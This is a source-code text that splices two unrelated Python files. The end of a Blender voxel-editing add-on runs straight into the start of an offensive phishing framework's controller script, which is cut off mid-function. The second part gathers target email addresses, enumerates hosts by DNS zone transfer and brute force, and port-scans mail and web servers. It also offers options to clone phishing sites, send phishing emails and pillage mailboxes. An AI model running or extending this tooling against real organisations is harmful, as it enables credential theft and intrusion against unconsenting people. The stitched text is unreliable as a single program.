#TODO, if I have other children types,
#could change to just deleting all of children,
#and using the BlenderObject delete method to do this.
super(Voxel, self).delete()
def select(self):
self.obj.select = True
def deselect(self):
self.obj.select = False
def select_children(self):
for obj in self.obj.children:
obj.select=True
def is_selected(self):
return self.obj.selected
def get_isect_mesh(self):
for obj in self.obj.children:
if obj.type == 'MESH':
if "_isect" in obj.name:
return IntersectionMesh(obj, self.context)
return None
def ray_cast(self, ray_origin, ray_target):
"""Wrapper for ray casting that moves the ray into object space"""
# get the ray relative to the object
matrix_inv = self.obj.matrix_world.inverted()
ray_origin_obj = matrix_inv * ray_origin
ray_target_obj = matrix_inv * ray_target
# cast the ray
hit, normal, face_index = self.obj.ray_cast(ray_origin_obj, ray_target_obj)
if face_index != -1:
#hit relative to world
hit_world = self.obj.matrix_world * hit
dist_squared = (hit_world - ray_origin).length_squared
vri = VoxelRayIntersection(self, hit, normal, dist_squared)
return vri
else:
return None
#keep this here for reference in case I decide to use
#duplis for the voxels
#def visible_objects_and_duplis():
#"""Loop over (object, matrix) pairs (mesh only)"""
#for obj in context.visible_objects:
#if obj.type == 'MESH':
#yield (obj, obj.matrix_world.copy())
#if obj.dupli_type != 'NONE':
#obj.dupli_list_create(scene)
#for dob in obj.dupli_list:
#obj_dupli = dob.object
#if obj_dupli.type == 'MESH':
#yield (obj_dupli, dob.matrix.copy())
def intersect_mesh(self, obj):
"""run a boolean intersect operation between a mesh object and the voxel
and the resultant mesh is parented to the voxel"""
select_none(bpy.context)
self.select()
print("Active:", bpy.context.active_object)
print("Object:", bpy.context.object)
print("self:", self.obj)
bpy.ops.object.duplicate() #duplicate selected object
#duplicated object is now selected and active
print("Active:", bpy.context.active_object)
print("Object:", bpy.context.object)
isect_obj = bpy.context.scene.objects[self.obj.name + ".001"]
isect_obj.select=True
bpy.context.scene.objects.active = isect_obj
isect_obj.name = self.obj.name + "_isect"
isect_obj.parent = self.obj
isect_obj.location = Vector((0.0, 0.0, 0.0))
#bpy.ops.object.modifier_add(type='BOOLEAN')
#select_none(bpy.context)
isect_mesh = IntersectionMesh(isect_obj, self.context, creating=True)
isect_mesh.select()
override = selection_context(isect_obj)
bpy.ops.object.modifier_add(override, type='BOOLEAN')
print(isect_obj.type)
print(isect_obj.name)
bool_mod = isect_obj.modifiers[0]
bool_mod.object = obj
bpy.ops.object.modifier_apply(override, modifier=bool_mod.name)
isect_obj.draw_type = "TEXTURED"
class VoxelArray(object):
"""VoxelArray is a utility class to facilitate accessing the sparse voxel
array, and saving to blend file.
An example usage would be:
va = VoxelArray(context.object)
va[0, 0, 0] = Voxel(...)
during assignment Voxel object is converted to blender's python ID property
format.
Currently voxels are based on objects in blender. This is convenient, because
it saves me work (in terms of saving the data to blend file, but it is also
crap because performance is bad. There is a limit of around 2000 voxels. Because
I've designed this program to be fairly modular, it shouldn't be too much work
in the future to replace this with an ID property system, which could possibly
be cached, but then the problem is displaying the voxels. Drawing in opengl is
quite a bit of extra work, and doesn't integrate as nicely. Doing stuff in edit
mode in a single object would be faster, but is more likely to result in user error
by editing the shape of the voxel array."""
#Operator Poll Functions
@classmethod
def poll_voxelarray_empty(cls, obj):
return obj is not None and obj.type == 'EMPTY'
@classmethod
def poll_voxelarray_empty_created(cls, obj):
if(cls.poll_voxelarray_empty(obj)):
if(obj.vox_empty.created):
return True
return False
@classmethod
def poll_can_boolean(cls, obj):
"""Method to check whether object is valid for a boolean intersection
between itself and a voxel array"""
if(obj.type != 'MESH'):
return False
if(Voxel.poll_voxel_mesh(obj)):
return False
return True
#yield functions
@classmethod
def voxelarrays_scene(cls, context):
for obj in context.scene.objects:
if cls.poll_voxelarray_empty(obj):
yield VoxelArray(obj, context)
#class property accessors
@classmethod
def get_selected(cls, context):
for va in cls.voxelarrays_scene(context):
if va.is_selected():
return va
return None
@classmethod
def clear_selected(cls, context):
for va in cls.voxelarrays_scene(context):
va.deselect()
def __init__(self, obj, context):
"""obj is the object in the context of the caller/creator"""
self.obj = obj
self.context = context
self.props = self.obj.vox_empty
def get_n_voxels(self):
return len(self)
def is_selected(self):
return self.obj.vox_empty.selected
def is_created(self):
return self.obj.vox_empty.created
def is_intersected(self):
return self.obj.vox_empty.intersected
def select_children(self):
for voxel in self.voxels():
voxel.select()
voxel.select_children()
def select_children_isect(self):
i = 0
for voxel in self.voxels():
voxel.select_children()
if i:
#set the first isect mesh as the active object
for isect_obj in voxel.obj.children:
set_active(self.context, isect_obj)
i+=1
def select(self):
self.clear_selected(self.context)
self.obj.vox_empty.selected = True
def deselect(self):
self.obj.vox_empty.selected = False
def apply_draw_type(self):
for voxel in self.voxels():
voxel.set_draw_type(self.draw_type())
def draw_type(self):
return self.obj.vox_empty.voxel_draw_type
def global_to_local(self, pos):
"""Convert global position to local position"""
matrix = self.obj.matrix_world.inverted()
return matrix * pos
def local_to_global(self, pos):
return self.obj.matrix_world * pos
def new_vox(self, pos):
#TODO: need to add check for replacing existing voxel
#pos_local = self.obj.matrix_world * pos
bpy.ops.mesh.primitive_cube_add()
vox = Voxel(get_active(self.context), self.context, creating=True)
vox.obj.location = pos
#vox.obj.scale = self.obj.scale
#svox.obj.rotation_euler = self.obj.rotation_euler
#print("active", get_active(self.context).name)
#print("self.obj", self.obj.name)
#print("vox.obj", vox.obj.name)
vox.obj.parent = self.obj
vox.gen_set_name(pos)
vox.set_draw_type(self.draw_type())
return vox
def del_vox_pos(self, pos):
#TODO: delete or rethink this function and if it's needed
vox = self.get_vox(pos)
if vox is not None:
override = {'selected_bases':[vox.obj]}
bpy.ops.delete(override)
return True
else:
return False
def voxels(self):
for c in self.obj.children:
yield Voxel(c, self.context)
def get_vox_pos(self, pos):
key_str = Voxel.gen_get_name(pos)
for c in self.obj.children:
if(c.name == key_str):
return Voxel(c, self.context)
return None
def intersect_ray(self, ray_origin, ray_target):
"""return list of voxel ray intersection instances
[VoxelRayIntersection, ...]"""
isects = []
for voxel in self.voxels():
isect = voxel.ray_cast(ray_origin, ray_target)
if isect is not None:
isects.append(isect)
if len(isects) == 0:
return None
else:
return isects
def get_intersect_obj(self):
isect_obj_name = self.obj.vox_empty.intersect_obj
if(isect_obj_name == ""):
return None
if isect_obj_name not in self.context.scene.objects:
return None
isect_obj = self.context.scene.objects[isect_obj_name]
return isect_obj
def intersect_mesh(self, obj, progress_callback):
n_voxels = len(self)
i = 0
for voxel in self.voxels():
isect_mesh = voxel.get_isect_mesh()
if isect_mesh is not None:
isect_mesh.delete()
voxel.intersect_mesh(obj)
print("Intersecting: {0}/{1}".format(i, n_voxels))
i += 1
progress_callback(int((float(i)/float(n_voxels))*100.0))
self.obj.vox_empty.intersected = True
def delete_intersection(self, obj):
for voxel in self.voxels():
isect_mesh = voxel.get_isect_mesh()
if isect_mesh is not None:
isect_mesh.delete()
self.obj.vox_empty.intersected = False
def __getitem__(self, index):
"""overload the "for in" method"""
return self.obj.children.__getitem__(index)
def get_name(self):
return self.obj.name
def __str__(self):
return str(self.obj)
def __len__(self):
return len(self.obj.children)
def voxelarray_apply_draw_type(drawtype_prop, context):
obj = context.object
va = VoxelArray(obj, context)
va.apply_draw_type()
class VoxelEmpty_props(bpy.types.PropertyGroup):
"""This class stores all the overall properties for the voxel array"""
intersect_obj = StringProperty(name="Intersect Obj",
description="Object to conduct intersection with voxels")
created = BoolProperty(
name="VoxelArray Created",
description="Voxel array has been created",
default=False)
selected = BoolProperty(
name="VoxelArray Selected",
description="Voxel array has been selected for editing",
default=False)
intersected = BoolProperty(
name="VoxelArray Intersected",
description="Voxel array has been intersected with object",
default=False)
voxel_draw_type = EnumProperty(
items=[
('TEXTURED','TEXTURED', 'voxels drawn with textures'),
('SOLID','SOLID', 'voxels drawn as solid'),
('WIRE','WIRE', 'voxels drawn as wireframe')],
name="Draw Type",
description="Draw type of the voxels in this VoxelArray",
update=voxelarray_apply_draw_type,
default='TEXTURED')
class VoxelEmpty_obj_prop(bpy.types.Panel):
"""This class is the panel that goes with the empty representing, and storing
all the data for the voxel array"""
bl_label = "Voxel Array"
bl_idname = "OBJECT_PT_voxelempty"
bl_space_type = "PROPERTIES"
bl_region_type = "WINDOW"
bl_context = "object"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.object)
def draw_header(self, context):
obj = context.object
if not obj.vox_empty.created:
self.layout.operator("object.voxelarray_create_voxels", text="Create")
def draw(self, context):
layout = self.layout
obj = context.object
va = VoxelArray(obj, context)
layout.active = va.is_created()
if(not va.is_selected()):
layout.operator("object.voxelarray_set_active", text="Set Active")
row = layout.row()
row.label(text="Active object is: " + obj.name)
row = layout.row()
row.prop(obj, "name")
if va.is_created():
row = layout.row()
nvoxels = len(va)
row.label(text="Voxels:{0}".format(nvoxels))
row = layout.row()
row.operator('object.voxelarray_select_children', text="Select Children")
row.operator('object.voxelarray_select_children_isect', text="Select Intersection")
row = layout.row()
p = context.object.vox_empty
row.prop(p, "voxel_draw_type")
# -- VoxelArray -> Mesh intersection ---
#set to only display intersect value when the selected
#object is valid for intersectiong
#TODO: change this to use a custom property collection for searching
#and selection of the object.
row = layout.row()
isect_label_text = ""
if va.is_intersected():
isect_label_text = "Re-Intersect With Object:"
else:
isect_label_text = "Intersect With Object:"
#print(obj.vox_empty.intersect_obj)
#row.prop(data=obj.vox_empty, property="intersect_obj")
isect_obj = va.get_intersect_obj()
if(isect_obj is not None):
valid_isect_obj = VoxelArray.poll_can_boolean(isect_obj)
else:
valid_isect_obj = False
if(valid_isect_obj):
row.operator("object.voxelarray_intersect_mesh", text=isect_label_text)
else:
row.label(text=isect_label_text)
if va.is_intersected():
row.operator("object.voxelarray_delete_intersection", text="Delete Intersection")
row = layout.row()
row.prop_search(context.object.vox_empty, "intersect_obj",
context.scene, "objects", icon = 'OBJECT_DATA', text = "")
#row.prop_search(data=obj.vox_empty,
#property="intersect_obj",
#search_data=context.scene.objects,
#search_property="name")
class VoxelMesh_obj_prop(bpy.types.Panel):
"""This class is the panel that goes with objects which represent the individual
voxels in the voxel array. """
bl_label = "Voxel Properties"
bl_idname = "OBJECT_PT_voxelmesh"
bl_space_type = "PROPERTIES"
bl_region_type = "WINDOW"
bl_context = "object"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
#TODO check that parent EMPTY has voxel array initialised
obj = context.object
return Voxel.poll_voxel_mesh(obj)
def draw(self, context):
layout = self.layout
obj = context.object
row = layout.row()
row.label(text="Hello world!", icon='WORLD_DATA')
row = layout.row()
row.label(text="Active object is: " + obj.name)
row = layout.row()
row.prop(obj, "name")
class VoxelArraySetActiveOp(Operator):
bl_idname = "object.voxelarray_set_active"
bl_label = "Set the active VoxelArray"
bl_options = {'UNDO'}
def execute(self, context):
obj = context.object
va = VoxelArray(obj, context)
va.select()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class VoxelArrayDeleteIntersectionOp(Operator):
bl_idname = "object.voxelarray_delete_intersection"
bl_label = "Delete VoxelArray Intersection"
bl_options = {'UNDO'}
def execute(self, context):
sb = SelectionBackup(context)
obj = context.object
va = VoxelArray(obj, context)
va.delete_intersection(obj)
sb.restore()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class VoxelArraySelectChildren(Operator):
bl_idname = "object.voxelarray_select_children"
bl_label = "Select VoxelArray Children"
bl_options = {'UNDO'}
def execute(self, context):
sb = SelectionBackup(context, active_only=True) #only backup active selection
obj = context.object
va = VoxelArray(obj, context)
va.select_children()
sb.restore()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class VoxelArraySelectChildrenIsect(Operator):
bl_idname = "object.voxelarray_select_children_isect"
bl_label = "Select VoxelArray Intersection"
bl_options = {'UNDO'}
def execute(self, context):
obj = context.object
va = VoxelArray(obj, context)
select_none(context)
va.select_children_isect()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class VoxelArrayIntersectMeshOp(Operator):
"""Operator to intersect between mesh object and the voxel array"""
bl_idname = "object.voxelarray_intersect_mesh"
bl_label = "Intersect Voxels Mesh"
bl_options = {'UNDO'}
_timer = None
def execute(self, context):
wm = bpy.context.window_manager
wm.progress_begin(0, 100)
sb = SelectionBackup(context)
obj = context.object
va = VoxelArray(obj, context)
isect_obj = va.get_intersect_obj()
print("Intersecting:" + isect_obj.name)
va.intersect_mesh(isect_obj, self.progress_callback)
sb.restore()
wm.progress_end()
return {'FINISHED'}
def progress_callback(self, value):
bpy.context.window_manager.progress_update(value)
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty_created(context.object)
def cancel(self, context):
return {'CANCELLED'}
class VoxelArrayCreateVoxelsOp(Operator):
"""Operator to create and enable voxels on an empty"""
bl_idname = "object.voxelarray_create_voxels"
bl_label = "Create Voxels"
bl_options = {'UNDO'}
def execute(self, context):
sb = SelectionBackup(context, append=True)
obj = context.object
obj.vox_empty.created = True
va = VoxelArray(obj, context)
va.new_vox(Vector((0, 0, 2)))
va.select()
del va
sb.restore()
return {'FINISHED'}
@classmethod
def poll(cls, context):
return VoxelArray.poll_voxelarray_empty(context.active_object)
class EditVoxelsOperator(bpy.types.Operator):
"""Modal object selection with a ray cast
TODO: implement some options in the operator option panel, see if
it's possible to put buttons in there for utility things while
editing the voxels.
One thing I would also like to do is add some opengl visual feedback
when editing in this operator"""
bl_idname = "view3d.edit_voxels"
bl_label = "Voxel Editor"
def pick_voxel(self, context, event, voxelarray):
"""Run this function on left mouse, execute the ray cast
TODO: report/go through some problems with selecting in the
operator_modal_view3d_raycast.py. Most of the problem is
when trying to click close to the edge of the object.
The distance values are often mucked up"""
# get the context arguments
ray_max=10000.0
region = context.region
rv3d = context.region_data
coord = event.mouse_region_x, event.mouse_region_y
# get the ray from the viewport and mouse
view_vector = view3d_utils.region_2d_to_vector_3d(region, rv3d, coord)
ray_origin = view3d_utils.region_2d_to_origin_3d(region, rv3d, coord)
ray_target = ray_origin + (view_vector * ray_max)
#TODO: raise some kind of error, or do a check/poll on this operator
#to ensure that there has been a voxel array created and selected
isects = voxelarray.intersect_ray(ray_origin, ray_target)
best_dist_squared = ray_max * ray_max
best_isect = None
if isects is None:
return None
for isect in isects:
dist_squared = isect.dist_squared
if(dist_squared < best_dist_squared):
best_dist_squared = dist_squared
best_isect = isect
return best_isect
def select_voxel(self, context, event):
sb = SelectionBackup(context)
va = VoxelArray.get_selected(context)
isect = self.pick_voxel(context, event, va)
if(isect is None):
sb.restore()
return None
vox = isect.voxel
sb.restore()
vox.select()
return vox
def add_voxel(self, context, event):
sb = SelectionBackup(context)
va = VoxelArray.get_selected(context)
isect = self.pick_voxel(context, event, va)
if(isect is None):
sb.restore()
return None
vox = isect.voxel
base_loc = vox.get_local_location()
new_loc = isect.nor * 2 + base_loc #add new voxel in direction normal
new_vox = va.new_vox(new_loc)
sb.restore()
#TODO: add a toggle for the select after placement
new_vox.select()
return new_vox
def delete_voxel(self, context, event):
sb = SelectionBackup(context)
va = VoxelArray.get_selected(context)
isect = self.pick_voxel(context, event, va)
#select_none(context)
if(isect is not None):
vox = isect.voxel
vox.delete()
sb.restore()
return True
else:
sb.restore()
return False
def modal(self, context, event):
if event.type in {'MIDDLEMOUSE', 'WHEELUPMOUSE', 'WHEELDOWNMOUSE'}:
# allow navigation
return {'PASS_THROUGH'}
if event.type == 'LEFTMOUSE' and event.value == 'RELEASE':
self.add_voxel(context, event)
return {'RUNNING_MODAL'}
if event.type == 'RIGHTMOUSE' and event.value == 'RELEASE':
#TODO: check return value, and cancel operator if
#nothing was deleted
retval = self.delete_voxel(context, event)
if(retval == False):
#TODO: add an option for this
return {'CANCELLED'}
if event.type in {'ESC'}:
return {'CANCELLED'}
return {'RUNNING_MODAL'}
def invoke(self, context, event):
if context.space_data.type == 'VIEW_3D':
context.window_manager.modal_handler_add(self)
return {'RUNNING_MODAL'}
else:
self.report({'WARNING'}, "Active space must be a View3d")
return {'CANCELLED'}
def register():
bpy.utils.register_module(__name__)
bpy.types.Object.vox_empty = PointerProperty(type=VoxelEmpty_props)
def unregister():
bpy.utils.unregister_module(__name__)
del bpy.types.Object.vox_empty
if __name__ == "__main__":
register()
|
|
#import getopt
import argparse
import emails
import sys
import re
import os
import subprocess
import time
import signal
from collections import defaultdict
#import our libs
from emails import EmailTemplate
from utils import Utils
from display import Display
from gather import Gather
from mydns import Dns
from webprofiler import profiler
from mydb import MyDB
from sitecloner import SiteCloner
from mailpillager import MailPillager
import portscan
#import our modules
from modules.theharvester import theHarvester
#=================================================
# Primary CLASS
#=================================================
class Framework(object):
def __init__(self):
self.config = {} # dict to contain combined list of config file options and commandline parameters
self.email_list = [] # list of email targets
self.hostname_list = [] # list of dns hosts
self.server_list = {}
self.profile_valid_web_templates = []
self.profile_dynamic_web_templates = []
self.pillaged_users = []
self.bestMailServerPort = None
self.bestMailServer = None
self.webserver = None # web server process
self.webserverpid = None
self.gather = None
self.mp = None # mail pillager
# initialize some config options
self.config["domain_name"] = ""
self.config["phishing_domain"] = ""
self.config["company_name"] = ""
self.config["config_filename"] = ""
self.config["email_list_filename"] = ""
# default all bool values to False
self.config["verbose"] = False
self.config["gather_emails"] = False
self.config["gather_dns"] = False
self.config["enable_externals"] = False
self.config["enable_web"] = False
self.config["enable_email"] = False
self.config["enable_email_sending"] = False
self.config["simulate_email_sending"] = False
self.config["daemon_web"] = False
self.config["always_yes"] = False
self.config["enable_advanced"] = False
self.config["profile_domain"] = False
self.config["pillage_email"] = False
# get current IP
#self.config['ip'] = None
# set a few misc values
self.pid_path = os.path.dirname(os.path.realpath(__file__)) + "/../"
self.display = Display()
self.email_templates = defaultdict(list)
#==================================================
# SUPPORT METHODS
#==================================================
#----------------------------
# CTRL-C display and exit
#----------------------------
def ctrlc(self):
print
self.display.alert("Ctrl-C caught!!!")
self.cleanup()
#----------------------------
# Close everything down nicely
#----------------------------
def cleanup(self):
print
if (self.webserver is not None):
if (self.config["daemon_web"]):
self.display.alert("Webserver is still running as requested.")
else:
# send SIGTERM to the web process
self.display.output("stopping the webserver")
self.webserver.send_signal(signal.SIGINT)
# delete the pid file
os.remove(self.pid_path + "spfwebsrv.pid")
# as a double check, manually kill the process
self.killProcess(self.webserverpid)
# call report generation
self.generateReport()
# exit
sys.exit(0)
#----------------------------
# Kill specified process
#----------------------------
def killProcess(self, pid):
if (os.path.exists("/proc/" + str(pid))):
self.display.alert("Killing process [%s]" % (pid))
os.kill(pid, signal.SIGKILL)
if (os.path.isfile(self.pid_path + "spfwebsrv.pid")):
os.remove(self.pid_path + "spfwebsrv.pid")
#----------------------------
# Generate The simple report
#----------------------------
def generateReport(self):
self.display.output("Generating phishing report")
self.display.log("ENDTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
# Start process
cmd = [os.getcwd() + "/report.py", self.outdir]
self.display.output("Report file located at %s%s" % (self.outdir + "reports/", subprocess.check_output(cmd)))
#----------------------------
# Parse CommandLine Parms
#----------------------------
def parse_parameters(self, argv):
parser = argparse.ArgumentParser()
#==================================================
# Input Files
#==================================================
filesgroup = parser.add_argument_group('input files')
filesgroup.add_argument("-f",
metavar="<list.txt>",
dest="email_list_file",
action='store',
help="file containing list of email addresses")
filesgroup.add_argument("-C",
metavar="<config.txt>",
dest="config_file",
action='store',
help="config file")
#==================================================
# Enable Flags
#==================================================
enablegroup = parser.add_argument_group('enable flags')
enablegroup.add_argument("--all",
dest="enable_all",
action='store_true',
help="enable ALL flags... same as (-g --external -s -w -v -v -y)")
enablegroup.add_argument("--test",
dest="enable_test",
action='store_true',
help="enable all flags EXCEPT sending of emails... same as (-g --external --simulate -w -y -v -v)")
enablegroup.add_argument("--recon",
dest="enable_recon",
action='store_true',
help="gather info (i.e. email addresses, dns hosts, websites, etc...) same as (-e --dns)")
enablegroup.add_argument("--external",
dest="enable_external",
action='store_true',
help="enable external tool utilization")
enablegroup.add_argument("--dns",
dest="enable_gather_dns",
action='store_true',
help="enable automated gathering of dns hosts")
enablegroup.add_argument("-g",
dest="enable_gather_email",
action='store_true',
help="enable automated gathering of email targets")
enablegroup.add_argument("-s",
dest="enable_send_email",
action='store_true',
help="enable automated sending of phishing emails to targets")
enablegroup.add_argument("--simulate",
dest="simulate_send_email",
action='store_true',
help="simulate the sending of phishing emails to targets")
enablegroup.add_argument("-w",
dest="enable_web",
action='store_true',
help="enable generation of phishing web sites")
enablegroup.add_argument("-W",
dest="daemon_web",
action='store_true',
help="leave web server running after termination of spf.py")
#==================================================
# Advanced Flags
#==================================================
advgroup = parser.add_argument_group('ADVANCED')
advgroup.add_argument("--adv",
dest="enable_advanced",
action='store_true',
help="perform all ADVANCED features same as (--dns --profile --pillage)")
advgroup.add_argument("--profile",
dest="profile_domain",
action='store_true',
help="profile the target domain (requires the --dns flag)")
advgroup.add_argument("--pillage",
dest="pillage_email",
action='store_true',
help="auto pillage email accounts (requires the --dns flag)")
#==================================================
# Optional Args
#==================================================
parser.add_argument("-d",
metavar="<domain>",
dest="domain",
action='store',
help="domain name to phish")
parser.add_argument("-p",
metavar="<domain>",
dest="phishdomain",
default="example.com",
action='store',
help="newly registered 'phish' domain name")
parser.add_argument("-c",
metavar="<company's name>",
dest="company",
action='store',
help="name of company to phish")
parser.add_argument("--ip",
metavar="<IP address>",
dest="ip",
#default=Utils.getIP(),
action='store',
help="IP of webserver defaults to [%s]" % (Utils.getIP()))
parser.add_argument("-v", "--verbosity",
dest="verbose",
action='count',
help="increase output verbosity")
#==================================================
# Misc Flags
#==================================================
miscgroup = parser.add_argument_group('misc')
miscgroup.add_argument("-y",
dest="always_yes",
action='store_true',
help="automatically answer yes to all questions")
# parse args
args = parser.parse_args()
# convert parameters to values in the config dict
self.config["domain_name"] = args.domain
if (self.config["domain_name"] is None):
self.config["domain_name"] = ""
self.config["phishing_domain"] = args.phishdomain
if (self.config["phishing_domain"] is None):
self.config["phishing_domain"] = "example.com"
self.config["company_name"] = args.company
if (args.ip):
self.config["ip"] = args.ip
self.config["config_filename"] = args.config_file
self.config["email_list_filename"] = args.email_list_file
self.config["verbose"] = args.verbose
self.config["gather_emails"] = args.enable_gather_email
self.config["gather_dns"] = args.enable_gather_dns
self.config["profile_domain"] = args.profile_domain
self.config["pillage_email"] = args.pillage_email
self.config["enable_externals"] = args.enable_external
self.config["enable_web"] = args.enable_web
self.config["enable_email_sending"] = args.enable_send_email
self.config["simulate_email_sending"] = args.simulate_send_email
self.config["daemon_web"] = args.daemon_web
self.config["always_yes"] = args.always_yes
# process meta flags
# recon = gather emails and gather dns
if (args.enable_recon == True):
self.config["gather_emails"] = True
self.config["gather_dns"] = True
# all = gather emails, enable externals, etc...
if (args.enable_all == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["enable_web"] = True
self.config["enable_email_sending"] = True
self.config["verbose"] = 2
self.config["always_yes"] = True
# test = gather emails, enable externals, etc...
if (args.enable_test == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["simulate_email_sending"] = True
self.config["enable_web"] = True
self.config["always_yes"] = True
self.config["verbose"] = 2
# advanced = dns, profile, and pillage
if (args.enable_advanced == True):
self.config["gather_dns"] = True
self.config["profile_domain"] = True
self.config["pillage_email"] = True
# profile requires dns
if (self.config["profile_domain"] and not self.config["gather_dns"]):
self.config["profile_domain"] = False
self.display.error("--profile requires the --dns option to be enabled as well.")
# pillage requires dns
if (self.config["pillage_email"] and not self.config["gather_dns"]):
self.config["pillage_email"] = False
self.display.error("--pillage requires the --dns option to be enabled as well.")
# see if we are good to go
good = False
if (self.config["email_list_filename"]
or self.config["gather_emails"]
or self.config["enable_externals"]
or self.config["enable_web"]
or self.config["enable_email_sending"]
or self.config["simulate_email_sending"]
or self.config["gather_dns"]
or self.config["profile_domain"]
or self.config["pillage_email"]):
good = True
if (not good):
self.display.error("Please enable at least one of the following parameters: -g --external --dns -s --simulate -w ( --all --test --recon --adv )")
print
parser.print_help()
sys.exit(1)
#----------------------------
# Process/Load config file
#----------------------------
def load_config(self):
# does config file exist?
if (self.config["config_filename"] is not None):
temp1 = self.config
temp2 = Utils.load_config(self.config["config_filename"])
self.config = dict(temp2.items() + temp1.items())
else:
# guess not.. so try to load the default one
if Utils.is_readable("default.cfg"):
self.display.error("a CONFIG FILE was not specified... defaulting to [default.cfg]")
print
temp1 = self.config
temp2 = Utils.load_config("default.cfg")
self.config = dict(temp2.items() + temp1.items())
else:
# someone must have removed it!
self.display.error("a CONFIG FILE was not specified...")
print
sys.exit(1)
# set verbosity/debug level
if (self.config['verbose'] >= 1):
self.display.enableVerbose()
if (self.config['verbose'] > 1):
self.display.enableDebug()
if (self.config["ip"] == "0.0.0.0") or (self.config["ip"] == None):
self.config["ip"]=Utils.getIP()
# set logging path
self.outdir = os.getcwd() + "/" + self.config["domain_name"] + "_" + self.config["phishing_domain"] + "/"
if not os.path.exists(os.path.dirname(self.outdir)):
os.makedirs(os.path.dirname(self.outdir))
self.display.setLogPath(self.outdir + "logs/")
# create sqllite db
self.db = MyDB(sqlite_file=self.outdir)
# log it
self.display.log("STARTTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
self.display.log("TARGETDOMAIN=%s\n" % (self.config["domain_name"]), filename="INFO.txt")
self.display.log("PHISHINGDOMAIN=%s\n" % (self.config["phishing_domain"]), filename="INFO.txt")
#----------------------------
# Load/Gather target email addresses
#----------------------------
def prep_email(self):
# are required flags set?
if ((self.config["email_list_filename"] is not None) or (self.config["gather_emails"] == True)):
print
self.display.output("Obtaining list of email targets")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# if an external email list file was specified, read it in
if self.config["email_list_filename"] is not None:
file = open(self.config["email_list_filename"], 'r')
temp_list = file.read().splitlines()
self.display.verbose("Loaded [%s] email addresses from [%s]" % (len(temp_list), self.config["email_list_filename"]))
self.email_list += temp_list
# gather email addresses
if self.config["gather_emails"] == True:
if (self.config["domain_name"] == ""):
self.display.error("No target domain specified. Can not gather email addresses.")
else:
self.display.verbose("Gathering emails via built-in methods")
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.emails()
self.display.verbose("Gathered [%s] email addresses from the Internet" % (len(temp_list)))
self.email_list += temp_list
print
# gather email addresses from external sources
if (self.config["gather_emails"] == True) and (self.config["enable_externals"] == True):
# theHarvester
self.display.verbose("Gathering emails via theHarvester")
thr = theHarvester(self.config["domain_name"], self.config["theharvester_path"], display=self.display)
out = thr.run()
if (not out):
temp_list = thr.emails()
self.display.verbose("Gathered [%s] email addresses from theHarvester" % (len(temp_list)))
self.email_list += temp_list
else:
self.display.error(out)
print
# # Recon-NG
# self.display.verbose("Gathering emails via Recon-NG")
# temp_list = reconng(self.config["domain_name"], self.config["reconng_path"]).gather()
# self.display.verbose("Gathered [%s] email addresses from Recon-NG" % (len(temp_list)))
# self.email_list += temp_list
# sort/unique email list
self.email_list = Utils.unique_list(self.email_list)
self.email_list.sort()
# add each user to the sqllite db
self.db.addUsers(self.email_list)
# print list of email addresses
self.display.verbose("Collected [%s] unique email addresses" % (len(self.email_list)))
self.display.print_list("EMAIL LIST",self.email_list)
for email in self.email_list:
self.display.log(email + "\n", filename="email_targets.txt")
#----------------------------
# Gather dns hosts
#----------------------------
def gather_dns(self):
# are required flags set?
if (self.config["gather_dns"] == True):
print
self.display.output("Obtaining list of host on the %s domain" % (self.config["domain_name"]))
self.display.verbose("Gathering hosts via built-in methods")
# Gather hosts from internet search
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.hosts()
self.display.verbose("Gathered [%s] hosts from the Internet Search" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from DNS lookups
temp_list = Dns.xfr(self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS Zone Transfer" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.ns(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS NS lookups" % (len(temp_list)))
self.hostname_list += temp_list
temp_list = Dns.mx(self.config["domain_name"])
temp_list = Utils.filterList(temp_list, self.config["domain_name"])
self.display.verbose("Gathered [%s] hosts from DNS MX lookups" % (len(temp_list)))
self.hostname_list += temp_list
# Gather hosts from dictionary lookup
try:
temp_list = Dns.brute(self.config["domain_name"], display=self.display)
except:
pass
self.display.verbose("Gathered [%s] hosts from DNS BruteForce/Dictionay Lookup" % (len(temp_list)))
self.hostname_list += temp_list
# sort/unique hostname list
self.hostname_list = Utils.unique_list(self.hostname_list)
self.hostname_list.sort()
# add list of identified hosts to sqllite db
self.db.addHosts(self.hostname_list)
# print list of hostnames
self.display.verbose("Collected [%s] unique host names" % (len(self.hostname_list)))
self.display.print_list("HOST LIST", self.hostname_list)
#----------------------------
# Perform Port Scans
#----------------------------
def port_scan(self):
# are required flags set?
if (self.config["gather_dns"] == True):
self.display.output("Performing basic port scans of any identified hosts.")
# define list of ports to scan for
ports = [25, 80,110, 143, 443, 993, 995]
# prep array of arrays
for port in ports:
self.server_list[port] = []
# for each host in the host list
for host in self.hostname_list:
# run port scan
openports = portscan.scan(host, ports)
found = False
# for any open ports, add it to the associated list
for port in openports:
self.db.addPort(port, host)
if (port == 80):
self.display.verbose("Found website at: %s 80" % (host))
self.server_list[80].append(host)
found = True
elif (port == 443):
self.display.verbose("Found website at: %s 443" % (host))
self.server_list[443].append(host)
found = True
elif (port == 110):
